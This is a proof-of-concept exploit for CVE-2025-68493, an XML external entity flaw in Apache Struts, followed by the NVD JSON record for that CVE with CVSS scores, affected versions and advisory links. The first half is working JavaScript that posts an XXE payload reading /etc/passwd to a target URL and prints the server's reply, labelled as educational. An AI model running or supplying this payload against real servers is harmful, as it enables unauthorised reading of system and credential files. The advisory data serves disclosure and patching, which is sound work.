CVE-2025-68493

// CVE-2025-68493 PoC - XML Validation Bypass // Target: Apache Struts < 6.1.1 // Note: This is a conceptual PoC for educational purposes only const axios = require('axios'); // Malicious XML payload exploiting missing validation const xmlPayload = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <data> <value>&file;</value> <type>malicious</type> </data>`; async function exploitCVE202568493(targetUrl) { try { const response = await axios.post(targetUrl, xmlPayload, { headers: { 'Content-Type': 'application/xml', 'User-Agent': 'Mozilla/5.0' }, timeout: 10000 }); console.log('Response Status:', response.status); console.log('Response Data:', response.data); return response.data; } catch (error) { if (error.response) { console.log('Exploit sent, check server response'); return error.response.data; } console.error('Error:', error.message); return null; } } // Usage // const target = 'http://target-server/struts2/action'; // exploitCVE202568493(target);

{"cve": {"id": "CVE-2025-68493", "sourceIdentifier": "[email protected]", "published": "2026-01-11T13:15:45.610", "lastModified": "2026-03-11T16:16:20.980", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing XML Validation vulnerability in Apache Struts, Apache Struts.\n\nThis issue affects Apache Struts: from 2.0.0 before 2.2.1; Apache Struts: from 2.2.1 through 6.1.0.\n\nUsers are recommended to upgrade to version 6.1.1, which fixes the issue."}, {"lang": "es", "value": "Vulnerabilidad de Validación XML Faltante en Apache Struts, Apache Struts.\n\nEste problema afecta a Apache Struts: desde 2.0.0 anterior a 2.2.1; Apache Struts: desde 2.2.1 hasta 6.1.0.\n\nSe recomienda a los usuarios actualizar a la versión 6.1.1, que corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-611"}]}, {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndIncluding": "2.3.37", "matchCriteriaId": "AB32EC52-8599-4E6C-9F87-D2BC050A2531"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.5.0", "versionEndIncluding": "2.5.33", "matchCriteriaId": "52DA80BB-35F0-4290-902F-66D27FB9A98F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.1.1", "matchCriteriaId": "F0B07FCF-E80A-4D94-BCA5-FE3C4249B854"}]}]}], "references": [{"url": "https://cwiki.apache.org/confluence/display/WW/S2-069", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/11/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}